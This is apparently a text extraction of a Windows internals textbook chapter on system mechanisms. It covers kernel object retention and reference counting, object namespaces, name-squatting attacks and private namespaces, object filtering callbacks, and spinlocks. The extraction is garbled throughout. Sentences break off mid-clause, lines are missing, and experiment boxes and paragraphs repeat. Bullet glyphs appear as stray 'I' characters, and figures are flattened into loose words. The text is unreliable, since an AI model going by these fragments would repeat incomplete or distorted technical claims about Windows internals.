NT AUTHORITY\RESTRICTED
I
Instead of using WinObj or WinObjEx64, you can view the handle table of a process using
Process Explorer, as shown in the experiment “Viewing open handles” earlier in this chapter,
or using Process Hacker, which has a similar view. Look at the handle table for the Explorer.exe
per-session namespace shortly.) You can double-click the object handle and then click the
Security tab and see a similar dialog box (with more users and rights granted).
Security tab and see a similar dialog box (with more users and rights granted).
Security
I
–o switch as shown in the following output. Note that using AccessChk will also show you
the integrity level of the object. (See Chapter 7 of Part 1, for more information on integrity
integrity level of the object. (See Chapter 7 of Part 1, for more information on integrity
integrity level
levels and the security reference monitor.)
C:\sysint>accesschk -o \Sessions\1\BaseNamedObjects
Accesschk v6.13 - Reports effective permissions for securable objects
Copyright (C) 2006-2020 Mark Russinovich
Sysinternals - www.sysinternals.com
\Sessions\1\BaseNamedObjects
Type: Directory
RW Window Manager\DWM-1
RW NT AUTHORITY\SYSTEM
RW DESKTOP-SVVLOTP\aione
RW DESKTOP-SVVLOTP\aione-S-1-5-5-0-841005
RW BUILTIN\Administrators
R Everyone
NT AUTHORITY\RESTRICTED
CHAPTER 8 System mechanisms
155
Windows also supports Ex (Extended) versions of the APIs—CreateEventEx, CreateMutexEx,
CreateSemaphoreEx—that add another argument for specifying the access mask. This makes it possible
for applications to use discretionary access control lists (DACLs) to properly secure their objects without
breaking their ability to use the create object APIs to open a handle to them. You might be wonder-
ing why a client application would not simply use OpenEvent, which does support a desired access
argument. Using the open object APIs leads to an inherent race condition when dealing with a failure
in the open call—that is, when the client application has attempted to open the event before it has
been created. In most applications of this kind, the open API is followed by a create API in the failure
case. Unfortunately, there is no guaranteed way to make this create operation atomic—in other words,
to occur only once.
Indeed, it would be possible for multiple threads and/or processes to have executed the create API
concurrently, and all attempt to create the event at the same time. This race condition and the extra
complexity required to try to handle it makes using the open object APIs an inappropriate solution
to the problem, which is why the Ex APIs should be used instead.
Object retention
There are two types of objects: temporary and permanent. Most objects are temporary—that is, they
remain while they are in use and are freed when they are no longer needed. Permanent objects remain
until they are explicitly freed. Because most objects are temporary, the rest of this section describes
how the Object Manager implements object retention—that is, retaining temporary objects only as
long as they are in use and then deleting them.
Manager can easily track how many of these processes, and which ones, are using an object. Tracking
these handles represents one part of implementing retention. The Object Manager implements object
name retention, and it is controlled by the number
of open handles to an object that exists. Every time a process opens a handle to an object, the Object
object and close their handles to it, the Object Manager decrements the open handle counter. When
deletion prevents processes from opening a handle to the object.
The second phase of object retention is to stop retaining the objects themselves (that is, to delete
them) when they are no longer in use. Because operating system code usually accesses objects by us-
ing pointers instead of handles, the Object Manager must also record how many object pointers it has
dispensed to operating system processes. As we saw, it increments a reference count for an object each
time it gives out a pointer to the object, which is called the pointer count; when kernel-mode compo-
The system also increments the reference count when it increments the handle count, and likewise dec-
rements the reference count when the handle count decrements because a handle is also a reference
to the object that must be tracked.
usage reference count, which adds cached references to the pointer count
and is decremented each time a process uses a handle. The usage reference count has been added
156
CHAPTER 8 System mechanisms
since Windows 8 for performance reasons. When the kernel is asked to obtain the object pointer from
its handle, it can do the resolution without acquiring the global handle table lock. This means that in
newer versions of Windows, the handle table entry described in the “Object handles and the process
handle table” section earlier in this chapter contains a usage reference counter, which is initialized the
verb use refers to the act of resolving the object pointer from its handle, an operation performed in
kernel by APIs like the ObReferenceObjectByHandle.
-
ing a handle to it. The event has a name, which implies that the Object Manager inserts it in the correct
usage reference count
count is still 1.)
Handle Table
Handle Table
Other structure
Handles
HandleCount=2
ReferenceCount=65536
Process A
Process B
System space
Event object
HandleCount=1
ReferenceCount=32770
Event object
DuplicateHandle
Index
FIGURE 8-35 Handles and reference counts.
Process B initializes, creates the second named event, and signals it. The last operation uses (refer-
ences) the second event, allowing it also to reach a reference value of 32,770. Process B then opens
object, bringing its counters to 2 and 32,771. (Remember, the new handle table entry still has its usage
CHAPTER 8 System mechanisms
157
usage reference count to 32,767. The value is added to the
object reference count, which is further increased by 1 unit, and reaches the overall value of 65,539.
Subsequent operations on the handle simply decreases the usage reference count without touching the
though—an operation that releases a reference count on the kernel object. Thus, after the four uses
When a process closes a handle to an object (an operation that causes the NtClose routine to be
executed in the kernel), the Object Manager knows that it needs to subtract the handle usage reference
-
tinue to exist because its reference count will become 1 (while its handle count would be 0). However,
when Process B closes its handle to the second event object, the object would be deallocated, because
its reference count reaches 0.
-
ence count might remain positive, indicating that the operating system is still using the object in some
way. Ultimately, it is only when the reference count drops to 0 that the Object Manager deletes the
object from memory. This deletion has to respect certain rules and also requires cooperation from the
memory (depending on the settings located in their object types), if a dereference occurs at an IRQL
level of DISPATCH_LEVEL or higher and this dereference causes the pointer count to drop to 0, the sys-
tem would crash if it attempted to immediately free the memory of a paged-pool object. (Recall that
such access is illegal because the page fault will never be serviced.) In this scenario, the Object Manager
performs a deferred delete operation, queuing the operation on a worker thread running at passive
-
ing to delete the object will result in the system attempting to acquire this lock. However, the driver
driver developers must use ObDereferenceObjectDeferDelete to force deferred deletion regardless of
complete more quickly, instead of waiting for the Object Manager to delete the object.
Because of the way object retention works, an application can ensure that an object and its name
remain in memory simply by keeping a handle open to the object. Programmers who write applications
that contain two or more cooperating processes need not be concerned that one process might delete an
might create a second process to execute a program in the background; it then immediately closes its
handle to the process. Because the operating system needs the second process to run the program, it
158
CHAPTER 8 System mechanisms
Because object leaks can be dangerous to the system by leaking kernel pool memory and eventu-
ally causing systemwide memory starvation—and can break applications in subtle ways—Windows
includes a number of debugging mechanisms that can be enabled to monitor, analyze, and debug
issues with handles and objects. Additionally, WinDbg comes with two extensions that tap into these
mechanisms and provide easy graphical analysis. Table 8-24 describes them.
TABLE 8-24 Debugging mechanisms for object handles
Mechanism
Enabled By
Kernel Debugger Extension
Handle Tracing Database
with the User Stack Trace option checked with
!htrace <handle value> <process ID>
Object Reference Tracing
Per-process-name(s), or per-object-type-pool-tag(s),
!obtrace <object pointer>
Object Reference Tagging
Drivers must call appropriate API
N/A
Enabling the handle-tracing database is useful when attempting to understand the use of each
handle within an application or the system context. The !htrace debugger extension can display the
the stack trace can pinpoint the code that is creating the handle, and it can be analyzed for a missing
call to a function such as CloseHandle.
The object-reference-tracing !obtrace extension monitors even more by showing the stack trace for
each new handle created as well as each time a handle is referenced by the kernel (and each time it is
opened, duplicated, or inherited) and dereferenced. By analyzing these patterns, misuse of an object
at the system level can be more easily debugged. Additionally, these reference traces provide a way to
understand the behavior of the system when dealing with certain objects. Tracing processes, for ex-
(such as Process Monitor) and help detect rogue or buggy third-party drivers that might be referencing
handles in kernel mode but never dereferencing them.
Note
the name of its pool tag by looking at the key member of the OBJECT_TYPE structure when
using the dx command. Each object type on the system has a global variable that references
this structure—for example, PsProcessType. Alternatively, you can use the !object command,
which displays the pointer to this structure.
Unlike the previous two mechanisms, object-reference tagging is not a debugging feature that must
driver developers to reference and dereference objects, including ObReferenceObjectWithTag and
ObDereferenceObjectWithTag. Similar to pool tagging (see Chapter 5 in Part 1 for more information on pool
tagging), these APIs allow developers to supply a four-character tag identifying each reference/dereference
pair. When using the !obtrace extension just described, the tag for each reference or dereference operation
is also shown, which avoids solely using the call stack as a mechanism to identify where leaks or under-
references might occur, especially if a given call is performed thousands of times by the driver.
CHAPTER 8 System mechanisms
159
Resource accounting
Resource accounting, like object retention, is closely related to the use of object handles. A positive
open handle count indicates that some process is using that resource. It also indicates that some pro-
-
ence count drop to 0, the process that was using the object should no longer be charged for it.
the types of quotas imposed on processes are sometimes diverse and complicated, and the code to
process component might limit users to some maximum number of new processes they can create
or a maximum number of threads within a process. Each of these limits is tracked and enforced in
different parts of the operating system.
In contrast, the Windows Object Manager provides a central facility for resource accounting. Each
object header contains an attribute called quota charges that records how much the Object Manager
opens a handle to the object.
Each process on Windows points to a quota structure that records the limits and current values
NonPagedPoolQuota, PagedPoolQuota,
and PagingFileQuota
Management.) Note that all the processes in an interactive session share the same quota block (and
Object names
An important consideration in creating a multitude of objects is the need to devise a successful system
for keeping track of them. The Object Manager requires the following information to help you do so:
I
A way to distinguish one object from another
I
shared memory, for example. The executive, in contrast, allows any resource represented by an object
Object names also satisfy a third requirement, which is to allow processes to share objects. The ex-
-
ate an object and place its name in the global namespace, and a second process can open a handle to
160
CHAPTER 8 System mechanisms
before storing the new name in the global namespace. The second is when a process opens a handle to
handle to the caller; thereafter, the caller uses the handle to refer to the object. When looking up a
name, the Object Manager allows the caller to select either a case-sensitive or case-insensitive search,
a feature that supports Windows Subsystem for Linux (WSL) and other environments that use case-
Object directories
possibly even other object directories. The object directory object maintains enough information to
translate these object names into pointers to the object headers of the objects themselves. The Object
Manager uses the pointers to construct the object handles that it returns to user-mode callers. Both
kernel-mode code (including executive components and device drivers) and user-mode code (such as
subsystems) can create object directories in which to store objects.
Objects can be stored anywhere in the namespace, but certain object types will always appear in
component responsible for the creation of Driver objects (through the IoCreateDriver API), only Driver
objects should exist there.
Table 8-25 lists the standard object directories found on all Windows systems and what types of ob-
-
plications that stick to documented APIs. (See the “Session namespace” section later in this chapter for
more information.)
TABLE 8-25 Standard object directories
Directory
Types of Object Names Stored
contains the named kernel objects created by Win32 or UWP APIs from within processes
that are running in an App Container.
Symbolic links mapping ARC-style paths to NT-style paths.
Global mutexes, events, semaphores, waitable timers, jobs, ALPC ports, symbolic links,
and section objects.
Callback objects (which only drivers can create).
CHAPTER 8 System mechanisms
161
Directory
Types of Object Names Stored
-
SystemPartition and BootPartition. Also contains the PhysicalMemory section object
directories, such as Http used by the Http.sys accelerator driver, and HarddiskN directo-
ries for each physical hard drive.
(SERVICE_FILE_SYSTEM_DRIVER or SERVICE_RECOGNIZER_DRIVER).
Symbolic links for locations where OS drivers can be installed and managed from.
Windows 10X devices.
SERVICE_FILE_SYSTEM_DRIVER
(SERVICE_RECOGNIZER_DRIVER) driver and -
Contains event objects that signal kernel pool resource conditions, the completion of
certain operating system tasks, as well as Session objects (at least Session0) represent-
ing each interactive session, and Partition objects (at least MemoryPartition0) for each
memory partition. Also contains the mutex used to synchronize access to the Boot
callback to refer to the correct partition for physical memory and commit resource con-
ditions, and for memory error detection.
Section objects for the known DLLs mapped by SMSS at startup time, and a symbolic
link containing the path for known DLLs.
directory is used instead to store WoW64 32-bit versions of those DLLs.
Section objects for mapped national language support (NLS) tables.
Object type objects for each object type created by ObCreateObjectTypeEx.
ALPC ports created to represent remote procedure call (RPC) endpoints when Local RPC
(ncalrpc) is used. This includes explicitly named endpoints, as well as auto-generated
COM (OLEXXXXX) port names and unnamed ports (LRPC-XXXX, where XXXX is a ran-
domly generated hexadecimal value).
Per-session namespace directory. (See the next subsection.)
If at least one Windows Server Container has been created, such as by using Docker for
ID of the root job for the container), which then contain the object namespace local to
that Silo.
Section objects used by virtualized instances (VAIL) of Win32k.sys and other window
manager components on Windows 10X devices when launching legacy Win32
applications. Also contains the Host object directory to represent the other side
of the connection.
Windows subsystem ALPC ports, shared section, and window stations in the
WindowStations object directory. Desktop Window Manager (DWM) also stores its
ALPC ports, events, and shared sections in this directory, for non-Session 0 sessions.
162
CHAPTER 8 System mechanisms
Object names are global to a single computer (or to all processors on a multiprocessor computer),
-
network. Server code on the remote Windows system calls the Object Manager and the I/O manager
Because the kernel objects created by non-app-container processes, through the Win32 and UWP API,
such as mutexes, events, semaphores, waitable timers, and sections, have their names stored in a single
object directory, no two of these objects can have the same name, even if they are of a different type. This
The issue with name collision may seem innocuous, but one security consideration to keep in mind
when dealing with named objects is the possibility of malicious object name squatting. Although object
current session namespace that can be set with the standard Windows API. This makes it possible for an
unprivileged application running in the same session as a privileged application to access its objects,
as described earlier in the object security subsection. Unfortunately, even if the object creator used
squatting attack, in which the un-
privileged application creates the object before the privileged application, thus denying access to the
legitimate application.
Windows exposes the concept of a private namespace to alleviate this issue. It allows user-mode
applications to create object directories through the CreatePrivateNamespace API and associate these
directories with boundary descriptors created by the CreateBoundaryDescriptor API, which are special
data structures protecting the directories. These descriptors contain SIDs describing which security
principals are allowed access to the object directory. In this manner, a privileged application can be
sure that unprivileged applications will not be able to conduct a denial-of-service attack against its ob-
Additionally, a boundary descriptor can also contain an integrity level, protecting objects possibly
belonging to the same user account as the application based on the integrity level of the process. (See
Chapter 7 of Part 1 for more information on integrity levels.)
One of the things that makes boundary descriptors effective mitigations against squatting attacks
is that unlike objects, the creator of a boundary descriptor must have access (through the SID and
integrity level) to the boundary descriptor. Therefore, an unprivileged application can only create an
unprivileged boundary descriptor. Similarly, when an application wants to open an object in a private
namespace, it must open the namespace using the same boundary descriptor that was used to create
it. Therefore, a privileged application or service would provide a privileged boundary descriptor, which
would not match the one created by the unprivileged application.
CHAPTER 8 System mechanisms
163
EXPERIMENT: Looking at the base named objects and private objects
You can see the list of base objects that have names with the WinObj tool from Sysinternals or
with WinObjEx64. However, in this experiment, we use WinObjEx64 because it supports addi-
tional object types and because it can also show private namespaces. Run Winobjex64.exe, and
click the BaseNamedObjects node in the tree, as shown here:
The named objects are listed on the right. The icons indicate the object type:
I
Mutexes are indicated with a stop sign.
I
I
Events are shown as exclamation points.
I
I
Symbolic links have icons that are curved arrows.
I
I
Power/network plugs represent ALPC ports.
I
Timers are shown as Clocks.
I
Other icons such as various types of gears, locks, and chips are used for other object types.
EXPERIMENT: Looking at the base named objects and private objects
You can see the list of base objects that have names with the WinObj tool from Sysinternals or
with WinObjEx64. However, in this experiment, we use WinObjEx64 because it supports addi-
tional object types and because it can also show private namespaces. Run Winobjex64.exe, and
click the BaseNamedObjects node in the tree, as shown here:
The named objects are listed on the right. The icons indicate the object type:
I
Mutexes are indicated with a stop sign.
I
I
Events are shown as exclamation points.
I
I
Symbolic links have icons that are curved arrows.
I
I
Power/network plugs represent ALPC ports.
I
Timers are shown as Clocks.
I
Other icons such as various types of gears, locks, and chips are used for other object types.
164
CHAPTER 8 System mechanisms
Now use the Extras menu and select Private Namespaces
shown here:
mutex is part of the LoadPerf boundary), and the SID(s) and integrity level associated with it (in
this case, no explicit integrity is set, and the SID is the one for the Administrators group). Note
that for this feature to work, you must have enabled kernel debugging on the machine the tool is
running on (either locally or remotely), as WinObjEx64 uses the WinDbg local kernel debugging
driver to read kernel memory.
Now use the Extras menu and select Private Namespaces
shown here:
mutex is part of the LoadPerf boundary), and the SID(s) and integrity level associated with it (in
this case, no explicit integrity is set, and the SID is the one for the Administrators group). Note
that for this feature to work, you must have enabled kernel debugging on the machine the tool is
running on (either locally or remotely), as WinObjEx64 uses the WinDbg local kernel debugging
driver to read kernel memory.
CHAPTER 8 System mechanisms
165
EXPERIMENT: Tampering with single instancing
of single-instancing enforcement through named objects. Notice that when launching the
Wmplayer.exe executable, Windows Media Player appears only once—every other launch simply
results in the window coming back into focus. You can tamper with the handle list by using
1.
Launch Windows Media Player and Process Explorer to view the handle table (by click-
ing View, Lower Pane View, and then Handles). You should see a handle whose name
2.
Right-click the handle and select Close Handle
that Process Explorer should be started as Administrator to be able to close a handle in
another process.
3.
Run Windows Media Player again. Notice that this time a second process is created.
4.
Go ahead and play a different song in each instance. You can also use the Sound Mixer
in the system tray (click the Volume icon) to select which of the two processes will have
greater volume, effectively creating a mixing environment.
Instead of closing a handle to a named object, an application could have run on its own be-
fore Windows Media Player and created an object with the same name. In this scenario, Windows
Media Player would never run because it would be fooled into believing it was already running
on the system.
EXPERIMENT: Tampering with single instancing
of single-instancing enforcement through named objects. Notice that when launching the
Wmplayer.exe executable, Windows Media Player appears only once—every other launch simply
results in the window coming back into focus. You can tamper with the handle list by using
1.
Launch Windows Media Player and Process Explorer to view the handle table (by click-
ing View, Lower Pane View, and then Handles). You should see a handle whose name
2.
Right-click the handle and select Close Handle
that Process Explorer should be started as Administrator to be able to close a handle in
another process.
3.
Run Windows Media Player again. Notice that this time a second process is created.
4.
Go ahead and play a different song in each instance. You can also use the Sound Mixer
in the system tray (click the Volume icon) to select which of the two processes will have
greater volume, effectively creating a mixing environment.
Instead of closing a handle to a named object, an application could have run on its own be-
fore Windows Media Player and created an object with the same name. In this scenario, Windows
Media Player would never run because it would be fooled into believing it was already running
on the system.
166
CHAPTER 8 System mechanisms
Symbolic links
-
narily hierarchical directory structure.
The Object Manager implements an object called a symbolic link object, which performs a similar
function for object names in its object namespace. A symbolic link can occur anywhere within an object
string that it substitutes for the symbolic link name. It then restarts its name lookup.
One place in which the executive uses symbolic link objects is in translating MS-DOS-style device
names into Windows internal device names. In Windows, a user refers to hard disk drives using the names
C:, D:, and so on, and serial ports as COM1, COM2, and so on. The Windows subsystem creates these
-
tory, which can also be done for additional drive letters through the DefineDosDevice API.
LowMemoryCondition, but due to the introduction of memory partitions (described in Chapter 5 of
Part 1), the condition that the event signals are now dependent on which partition the caller is running
in (and should have visibility of). As such, there is now a LowMemoryCondition event for each memory
partition, and callers must be redirected to the correct event for their partition. This is achieved with
executed each time the link is parsed by the Object Manager. With WinObjEx64, you can see the
doing a !object \KernelObjects\LowMemoryCondition command and then dumping the _OBJECT_
SYMBOLIC_LINK structure with the dx command.)
FIGURE 8-36 The LowMemoryCondition symbolic link redirection callback.
CHAPTER 8 System mechanisms
167
Session namespace
Services have full access to the global
the namespace. Regular user applications then have read-write (but not delete) access to the global
namespace (minus some exceptions we explain soon.) In turn, however, interactive user sessions are
then given a session-private view of the namespace known as a local namespace. This namespace
provides full read/write access to the base named objects by all applications running within that
-
Making separate copies of the same parts of the namespace is known as instancing the namespace.
are running an application that creates a named object, each user session must have a private version
-
ing the same object. If the Win32 application is running under an AppContainer, however, or is a UWP
whose names correspond to the Package SID of the AppContainer (see Chapter 7 of Part 1, for more
information on AppContainer and the Windows sandboxing model).
The Object Manager implements a local namespace by creating the private versions of the four
n (where
n
event, for example, the Win32 subsystem (as part of the BaseGetNamedObjectDirectory API in
One more way through which name objects can be accessed is through a security feature called
Base Named Object (BNO) Isolation. Parent processes can launch a child with the ProcThreadAttribute
BnoIsolation-
-
tory and initial set of objects (such as symbolic links) to support it, and then have NtCreateUserProcess
BnoIsolationHandlesEntry
168
CHAPTER 8 System mechanisms
Later, BaseGetNamedObjectDirectory queries the Token object to check if BNO Isolation is enabled,
sort of sandbox for a process without having to use the AppContainer functionality.
All object-manager functions related to namespace management are aware of the instanced direc-
tories and participate in providing the illusion that all sessions use the same namespace. Windows sub-
directory with \??
named DeviceMap in the executive process object (EPROCESS, which is described further in Chapter 3
of Part 1) that points to a data structure shared by other processes in the same session.
The DosDevicesDirectoryDeviceMap structure points at the Object Manager directory
DosDevicesDirectoryDeviceMap. If the
DeviceMap
GlobalDosDevicesDirectory
DeviceMap
Under certain circumstances, session-aware applications need to access objects in the global session
even if the application is running in another session. The application might want to do this to synchro-
nize with instances of itself running in other remote sessions or with the console session (that is, session
Session directories are isolated from each other, but as mentioned earlier, regular user applications
Section and symbolic link objects cannot be globally created unless the caller is running in Session
0 or if the caller possesses a special privilege named create global object
ObUnsecureGlobalNames value. By default, these names
are usually listed:
I
netfxcustomperfcounters.1.0
I
SharedPerfIPCBlock
I
I
CHAPTER 8 System mechanisms
169
EXPERIMENT: Viewing namespace instancing
You can see the separation between the session 0 namespace and other session namespaces as
see a subdirectory with a numeric name for each active session. If you open one of these direc-
BaseNamedObjects, which are the local namespace subdirectories of the session. The following
Next, run Process Explorer and select a process in your session (such as Explorer.exe), and then
view the handle table (by clicking View, Lower Pane View, and then Handles). You should see a
n, where n is the session ID.
EXPERIMENT: Viewing namespace instancing
You can see the separation between the session 0 namespace and other session namespaces as
see a subdirectory with a numeric name for each active session. If you open one of these direc-
BaseNamedObjects, which are the local namespace subdirectories of the session. The following
Next, run Process Explorer and select a process in your session (such as Explorer.exe), and then
view the handle table (by clicking View, Lower Pane View, and then Handles). You should see a
n, where n is the session ID.
170
CHAPTER 8 System mechanisms
Object filtering
ability to use the altitude
-
ers are permitted to intercept calls such as NtOpenThread and NtOpenProcess and even to modify the
access masks being requested from the process manager. This allows protection against certain opera-
tions on an open handle—such as preventing a piece of malware from terminating a benevolent security
process or stopping a password dumping application from obtaining read memory permissions on the
LSA process. Note, however, that an open operation cannot be entirely blocked due to compatibility is-
sues, such as making Task Manager unable to query the command line or image name of a process.
pre and post callbacks, allowing them to prepare
which can be returned across all calls to the driver or across a pre/post pair. These callbacks can be
registered with the ObRegisterCallbacks API and unregistered with the ObUnregisterCallbacks API—it is
the responsibility of the driver to ensure deregistration happens.
Use of the APIs is restricted to images that have certain characteristics:
I
The image must be signed, even on 32-bit computers, according to the same rules set forth in
/integrity-
checkIMAGE_DLLCHARACTERISTICS_FORCE_INTEGRITY value in the
PE header. This instructs the memory manager to check the signature of the image regardless of
any other defaults that might not normally result in a check.
I
The image must be signed with a catalog containing cryptographic per-page hashes of the
executable code. This allows the system to detect changes to the image after it has been loaded
in memory.
Before executing a callback, the Object Manager calls the MmVerifyCallbackFunction on the target
function pointer, which in turn locates the loader data table entry associated with the module owning
LDRP_IMAGE_INTEGRITY_FORCED
Synchronization
The concept of mutual exclusion is a crucial one in operating systems development. It refers to the guar-
antee that one, and only one, thread can access a particular resource at a time. Mutual exclusion is neces-
CHAPTER 8 System mechanisms
171
when two threads running on different processors both write data to a circular queue.
Processor A
Get queue tail
Insert data at current location
•••
Increment tail pointer
•••
Time
Processor B
•••
Get queue tail
•••
Insert data at current location /*ERROR*/
Increment tail pointer
•••
FIGURE 8-37 Incorrect sharing of memory.
-
happen on a multiprocessor system, the same error could occur on a single-processor system if the
queue tail pointer.
Sections of code that access a nonshareable resource are called critical sections. To ensure correct
-
dating a database, or modifying a shared variable, no other thread can be allowed to access the same
data structure without mutual exclusion.
The issue of mutual exclusion, although important for all operating systems, is especially impor-
tant (and intricate) for a tightly coupled, symmetric multiprocessing (SMP) operating system such as
Windows, in which the same system code runs simultaneously on more than one processor, sharing
-
nisms that system code can use to prevent two threads from modifying the same data at the same
time. The kernel provides mutual-exclusion primitives that it and the rest of the executive use to syn-
chronize their access to global data structures.
Because the scheduler synchronizes access to its data structures at DPC/dispatch level IRQL, the
kernel and executive cannot rely on synchronization mechanisms that would result in a page fault or
reschedule operation to synchronize access to data structures when the IRQL is DPC/dispatch level
or higher (levels known as an elevated or high
kernel and executive use mutual exclusion to protect their global data structures when the IRQL is high
and what mutual-exclusion and synchronization mechanisms the kernel and executive use when the
IRQL is low (below DPC/dispatch level).
172
CHAPTER 8 System mechanisms
High-IRQL synchronization
At various stages during its execution, the kernel must guarantee that one, and only one, processor at
mutually exclusive manner.
Simple single-processor operating systems sometimes prevent such a scenario by disabling all inter-
rupts each time they access global data, but the Windows kernel has a more sophisticated solution.
Before using a global resource, the kernel temporarily masks the interrupts whose interrupt handlers
-
causes the dispatcher, which uses the dispatcher database, to run. Therefore, any other part of the
kernel that uses the dispatcher database raises the IRQL to DPC/dispatch level, masking DPC/dispatch-
level interrupts before using the dispatcher database.
-
processor. The kernel also needs to guarantee mutually exclusive access across several processors.
Interlocked operations
The simplest form of synchronization mechanisms relies on hardware support for multiprocessor-
safe manipulation of integer values and for performing comparisons. They include functions such as
InterlockedIncrement, InterlockedDecrement, InterlockedExchange, and InterlockedCompareExchange.
The InterlockedDecrement function, for example, uses the x86 and x64 lock-
ple, lock xadd) to lock the multiprocessor bus during the addition operation so that another processor
functions are called intrinsic because the code for them is generated in an inline assembler, directly
-
rameters onto the stack, calling the function, copying the parameters into registers, and then popping
the parameters off the stack and returning to the caller would be a more expensive operation than the
Spinlocks
The mechanism the kernel uses to achieve multiprocessor mutual exclusion is called a spinlock. A
spinlock is a locking primitive associated with a global data structure, such as the DPC queue shown
CHAPTER 8 System mechanisms
173
Do
Try to acquire
DPC queue
spinlock
Until SUCCESS
Do
Try to acquire
DPC queue
spinlock
Until SUCCESS
Processor A
•••
Processor B
•••
DPC queue
Begin
Remove DPC from queue
End
Release DPC queue spinlock
Begin
Add DPC from queue
End
Release DPC queue spinlock
Critical section
Spinlock
DPC
DPC
FIGURE 8-38 Using a spinlock.
-
lock until it succeeds. The spinlock gets its name from the fact that the kernel (and thus, the processor)
waits, “spinning,” until it gets the lock.
Spinlocks, like the data structures they protect, reside in nonpaged memory mapped into the
system address space. The code to acquire and release a spinlock is written in assembly language for
speed and to exploit whatever locking mechanism the underlying processor architecture provides. On
many architectures, spinlocks are implemented with a hardware-supported test-and-set operation,
which tests the value of a lock variable and acquires the lock in one atomic instruction. Testing and ac-
quiring the lock in one instruction prevents a second thread from grabbing the lock between the time
such the lock instruction mentioned earlier can also be used on the test-and-set operation, resulting in
the combined lock bts opcode on x86 and x64 processors, which also locks the multiprocessor bus; oth-
erwise, it would be possible for more than one processor to perform the operation atomically. (Without
the lock, the operation is guaranteed to be atomic only on the current processor.) Similarly, on ARM
processors, instructions such as ldrex and strex can be used in a similar fashion.
All kernel-mode spinlocks in Windows have an associated IRQL that is always DPC/dispatch level or
lower ceases on that processor. Because thread dispatching happens at DPC/dispatch level, a thread
that holds a spinlock is never preempted because the IRQL masks the dispatching mechanisms. This
masking allows code executing in a critical section protected by a spinlock to continue executing so
that it will release the lock quickly. The kernel uses spinlocks with great care, minimizing the number of
instructions it executes while it holds a spinlock. Any processor that attempts to acquire the spinlock
and performing no actual work.
174
CHAPTER 8 System mechanisms
On x86 and x64 processors, a special pause assembly instruction can be inserted in busy wait loops,
and on ARM processors, yieldhint to the processor
that the loop instructions it is processing are part of a spinlock (or a similar construct) acquisition loop.
I
looping.
I
On SMT cores, it allows the CPU to realize that the “work” being done by the spinning logical
core is not terribly important and awards more CPU time to the second logical core instead.
I
Because a busy wait loop results in a storm of read requests coming to the bus from the waiting
thread (which might be generated out of order), the CPU attempts to correct for violations of
memory order as soon as it detects a write (that is, when the owning thread releases the lock).
Thus, as soon as the spinlock is released, the CPU reorders any pending memory read opera-
tions to ensure proper ordering. This reordering results in a large penalty in system perfor-
mance and can be avoided with the pause instruction.
If the kernel detects that it is running under a Hyper-V compatible hypervisor, which sup-
ports the spinlock enlightenment (described in Chapter 9), the spinlock facility can use the
HvlNotifyLongSpinWait library function when it detects that the spinlock is currently owned
by another CPU, instead of contiguously spinning and use the pause instruction. The func-
tion emits a HvCallNotifyLongSpinWait hypercall to indicate to the hypervisor scheduler that
another VP should take over instead of emulating the spin.
The kernel makes spinlocks available to other parts of the executive through a set of kernel func-
tions, including KeAcquireSpinLock and KeReleaseSpinLock. Device drivers, for example, require spin-
locks to guarantee that device registers and other global data structures are accessed by only one part
of a device driver (and from only one processor) at a time. Spinlocks are not for use by user programs—
user programs should use the objects described in the next section. Device drivers also need to protect
access to their own data structures from interrupts associated with themselves. Because the spinlock
KeAcquireInterruptSpinLock and KeReleaseInterruptSpinLock
system looks inside the interrupt object for the associated DIRQL with the interrupt and raises the IRQL
to the appropriate level to ensure correct access to structures shared with the ISR.
Devices can also use the KeSynchronizeExecution API to synchronize an entire function with an ISR
instead of just a critical section. In all cases, the code protected by an interrupt spinlock must execute
negative performance effects.
an IRQL of DPC/dispatch level or higher, as explained earlier, code holding a spinlock will crash the
system if it attempts to make the scheduler perform a dispatch operation or if it causes a page fault.
CHAPTER 8 System mechanisms
175
Queued spinlocks
To increase the scalability of spinlocks, a special type of spinlock, called a queued spinlock, is used in
many circumstances instead of a standard spinlock, especially when contention is expected, and fair-
ness is required.
A queued spinlock works like this: When a processor wants to acquire a queued spinlock that is
the meantime, a processor waiting for a busy spinlock checks the status not of the spinlock itself but of
-
synchronization, and the memory location of the bit is not in a single NUMA node that then has to be
snooped through the caches of each logical processor. The second is that instead of a random pro-
queued spinlocks do require additional overhead, including extra interlocked operations, which do add
decide if a queued spinlock is worth it for them.
globalprocessor
control region LockArrayKPCR
data structure.
A global spinlock can be acquired by calling KeAcquireQueuedSpinLock with the index into the array
at which the pointer to the spinlock is stored. The number of global spinlocks originally grew in each
KSPIN_LOCK_QUEUE_NUMBER enumeration, but note, however,
that acquiring one of these queued spinlocks from a device driver is an unsupported and heavily
176
CHAPTER 8 System mechanisms
EXPERIMENT: Viewing global queued spinlocks
You can view the state of the global queued spinlocks (the ones pointed to by the queued
!qlocks kernel debugger command. In the
following example, note that none of the locks are acquired on any of the processors, which is a
standard situation on a local system doing live debugging.
lkd> !qlocks
Key: O = Owner, 1-n = Wait order, blank = not owned/waiting, C = Corrupt
Processor Number
Lock Name
0 1 2 3 4 5 6 7
KE - Unused Spare
MM - Unused Spare
MM - Unused Spare
MM - Unused Spare
CC - Vacb
CC - Master
EX - NonPagedPool
IO - Cancel
CC - Unused Spare
In-stack queued spinlocks
Device drivers can use dynamically allocated queued spinlocks with the KeAcquireInStackQueued
SpinLock and KeReleaseInStackQueuedSpinLock functions. Several components—including the cache
global queued spinlocks.
KeAcquireInStackQueuedSpinLock takes a pointer to a spinlock data structure and a spinlock queue
handle. The spinlock queue handle is actually a data structure in which the kernel stores information
usually a stack variable, guaranteeing locality to the caller thread and is responsible for the InStack part
of the spinlock and API name.
Reader/writer spin locks
While using queued spinlocks greatly improves latency in highly contended situations, Windows
contention in many situations to begin with. The multi-reader, single-writer spinlock, also called
the executive spinlock, is an enhancement on top of regular spinlocks, which is exposed through
the ExAcquireSpinLockExclusive, ExAcquireSpinLockShared API, and their ExReleaseXxx counterparts.
Additionally, ExTryAcquireSpinLockSharedAtDpcLevel and ExTryConvertSharedSpinLockToExclusive
functions exist for more advanced use cases.
EXPERIMENT: Viewing global queued spinlocks
You can view the state of the global queued spinlocks (the ones pointed to by the queued
!qlocks kernel debugger command. In the
following example, note that none of the locks are acquired on any of the processors, which is a
standard situation on a local system doing live debugging.
lkd> !qlocks
Key: O = Owner, 1-n = Wait order, blank = not owned/waiting, C = Corrupt
Processor Number
Lock Name
0 1 2 3 4 5 6 7
KE - Unused Spare
MM - Unused Spare
MM - Unused Spare
MM - Unused Spare
CC - Vacb
CC - Master
EX - NonPagedPool
IO - Cancel
CC - Unused Spare
CHAPTER 8 System mechanisms
177
